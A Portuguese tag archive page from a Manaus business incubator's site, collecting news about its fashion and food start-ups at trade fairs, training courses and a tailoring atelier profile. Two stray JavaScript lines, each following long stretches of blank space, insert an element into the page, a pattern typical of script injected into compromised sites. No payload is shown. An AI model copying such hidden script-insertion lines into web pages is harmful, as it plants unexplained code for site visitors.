• 92 3216-3892
  • secretaria@cide.org.br

Arquivo da tag moda

Empreendedores do CIDE em feira internacional

21230903_1994684017428882_323337759999967563_n

 

Manaus recebe neste fim de semana, de 1 a 10 de setembro, a feira internacional de artesanato moda e decoração, Mundial Art, e as empresas Sabores de Tradição, Temperos da Amazônia, Cheiro de Folha da Amazônia e Amazon Doces, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), vão participar. Esses empreendimentos atuam no segmento de Alimentos, Panificação, Perfumaria e Cosméticos, e Temperos Regionais. O evento acontece no Centro de Convenções do Amazonas Vasco Vasques, das 15hs às 22hs.

Segundo o diretor executivo do CIDE, José Grosso, a feira é uma oportunidade para divulgar os trabalhos locais e a qualidade dos produtos feitos no Amazonas. “Estamos dando apoio às nossas empresas para que elas divulguem suas marcas e façam bom negócios. É uma forma de estimular o emprego e profissionalizar o mercado artesanal”, diz.

A Mundial Art reunirá representantes de mais de 20 países e vários Estados do Brasil e municípios do Amazonas, que serão distribuídos em vários estandes, com itens de artesanato regional, nacional e internacional, moda e decoração.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CIDE 2: capacitar, projetar e colocar em prática

Muitas pessoas visitam o "Cide Moda e Design", buscando roupas exclusivas

Muitas pessoas visitam o “Cide Moda e Design”, buscando roupas exclusivas

 

 

A Unidade 2 do Centro de Incubação e Desenvolvimento Empresarial (CIDE), conhecida como “CIDE Moda e Design”, localizada no bairro Alvorada, zona Centro-Oeste de Manaus, realizou várias ações em outubro e novembro, com o objetivo de tornar conhecidas as empresas de confecção, instaladas naquele local.

 

Para a gestora do “CIDE 2”, Elizabeth Araújo, o calendário de ações teve como foco os empresários, conhecidos como incubados, e seus produtos. “Nos meses de outubro e novembro de 2016, os empresários puderam participar de reuniões, curso e eventos voltados para o setor da Moda, o que foi de suma importância para os mesmos e pode resultar em novos olhares sobre a empresa e sobre o papel destes frente a sociedade”, conta Elizabeth, acrescentando que “movimento é vida”.

 

Ainda conforme Elizabeth Araújo, no dia 6 de outubro, os empresários participaram de uma reunião na sede do SEBRAE Amazonas e contaram com a presença da gestora do projeto de confecções, Clarice Maquiné, onde foi apresentada uma proposta de consultoria pontual junto as empresas.

 

Planejamento

No período de 11 a 21 de outubro, foi realizado o curso de Planejamento Estratégico, ministrado pela própria gestora do “CIDE 2”. “Foi um curso que pode abrir novos horizontes, mostrando que um planejamento empresarial é importante para que a empresa tenha em vista a meta a ser alcançada e o caminho que se deve seguir para conseguir”, diz a participante e empresária residente Socorro Flores. O curso teve carga horária de 24 horas.

 

Foi também no mês de outubro que as empresas Maison Rien de Base, Moda Flores da Amazônia e Crie e Recrie, participaram expondo seus modelos, do InovaModa Verão 2018, apresentando ao grande público, peças criadas e desenvolvidas na incubadora, o que foi de grande importância, pois o público alvo era empresários do setor, estudantes de moda e possíveis parceiros empresariais.

 

E para concluir o mês, foi realizado o 3° Bazar de Fábrica, que contou com a participação de todas as empresas incubadas e foi um sucesso de vendas, tanto que o 4° Bazar já está programado para os dias 15, 16 e 17 de dezembro de 2016

 

Novembro

Em novembro, foi a vez da empresa Crie e Recrie brilhar na passarela da segunda semana de Moda do Amazonas, promovido pela Fundação Amazônia Sustentável (FAZ), Cabedal de Criadores e FAAL Eventos, o Amazon Fashion Avenue. Evento que tem movimentado a moda local, dando espaço para que os estilistas da região possam apresentar com maestria suas criações.

 

Segundo a gestora, Elizabeth Araújo, a adesão dos empresários, assim como a dedicação de todos aos eventos é muito importante, pois mostra que o empreendedorismo regional e a valorização da moda Amazônica é algo possível. “Num período, no qual a economia tem afetado as vendas, o fato de que o empresariado da Moda participe e apresente seus produtos ao público, tornando assim, suas marcas conhecidas, é o resultado de uma ação conjunta e cooperação mútua”, finaliza a gestora.

O "CIDE Moda e Design" tem preços acessíveis.

O “CIDE Moda e Design” tem preços acessíveis.

 

 

Empreendedores do "Cide Moda e Design" recebem capacitação.

Empreendedores do “Cide Moda e Design” recebem capacitação.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

Roupas femininas: Exclusividade sob medida no CIDE 2

Socorro Flores (à dir.) e suas funcionárias comercializam as roupas no CIDE 2.

Socorro Flores (à dir.) e suas funcionárias comercializam as roupas no CIDE 2.

 

Um método de investimento em vestuário que está ganhando força e cada vez mais adeptos é a fabricação da roupa sob medida. Os ateliers de costura fabricam a peça da forma, tamanho e modelo desejado e oferece exclusividade, pois o cliente é quem define a cor, tecido e o modelo, garantindo assim que não terá surpresas em achar outra pessoa com a mesma roupa na mesma ocasião.

 

As irmãs Socorro Flores e Rejane Flores, proprietárias da Moda Flores Amazônia, empresa instalada no Centro de Incubação e Desenvolvimento Empresarial – Moda e Design (CIDE 2), trabalham com a fabricação direta das peças femininas, proporcionando qualidade e exclusividade, e deixando as suas clientes bem vestidas.

 

“Nós somos filhas de costureira e fomos criadas vendo os trabalhos da minha mãe e herdamos essa profissão”, conta a gerente Socorro Flores.

 

Ainda segundo Flores, os primeiros trabalhos de confecção foram feitos em família e com ajuda de amigos. “Cada um tinha uma função na área da costura”, diz.

 

Esforço próprio

Com recursos próprios, começaram a comercializar as roupas para parentes e amigos, e foram formando sua própria clientela. “Eu decidi fazer viagens a feiras de modas e me preparar para agregar mais qualidade e valor ao nosso produto, e conhecer possíveis fornecedores. Ao voltar para Manaus, eu aplicava essa formação na confecção de novos produtos”, diz a gerente, lembrando que a empresa participou de eventos de moda, como o São Paulo Fashion Week e o Estética & Moda, com a ajuda do Sebrae-AM.

 

A alma do negócio

Sabemos que a primeira impressão é a que fica. E as proprietárias do atelier de roupas usaram um método simples e impactante. “Além de o ‘boca a boca’ que fazíamos dos nossos produtos, eu mesma vestia os modelos confeccionados que chamavam a atenção das minha colegas e de futuros clientes. Eu era uma espécie de modelo e assim fomos trazendo outras pessoas para conhecer a nossa loja. Hoje, temos famílias inteiras que são nossas clientes”, destaca Socorro.

 

Para ela, o segredo está em fazer bem feito e estar sempre atualizado com as tendências. “Nossos clientes hoje são das classes alta e média. Mulheres da área jurídica, professoras de universidades e de escolas públicas, empresárias e universitárias”, conclui.

 

Juntamente com as irmãs Flores, trabalha desde o início da abertura da empresa Luciane Gomes, especialista em fardamentos e a mais nova funcionária, Eliete Ly. Elas formam a equipe da Moda Flores Amazônia.

Para saber mais ligue para (92) 3634-2246

C22

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Polo de Modas do CIDE participa da Estética e Moda 2015

 

Empreendedores de Moda e administradores do CIDE na 17ª feira.

Empreendedores de Moda e administradores do CIDE na 17ª feira.

 

 

As empresas do Polo de Modas do CIDE Alvorada iniciaram, na tarde de ontem, 24, no Centro de Convenções do Studio 5, zona Sul de Manaus, as vendas de produtos femininos, como roupas e acessórios, na 17ª feira Estética e Moda. Em total, sete empresas participam do evento que termina no próximo domingo, 27.

A empresa Moda Flor Amazônia trouxe para a feira os melhores produtos confeccionados no CIDE Alvorada. “Quero agradecer pela oportunidade de expor nossos melhores produtos, feitos com amor e qualidade”, diz a proprietária Socorro Flor.

Neste ano, o evento trouxe novidades, como o desfile infantil e o espaço gourmet, além dos desfiles tradicionais e stands com cursos, palestras e workshops voltados a área da estética.

 

E2

 

E4

 

E1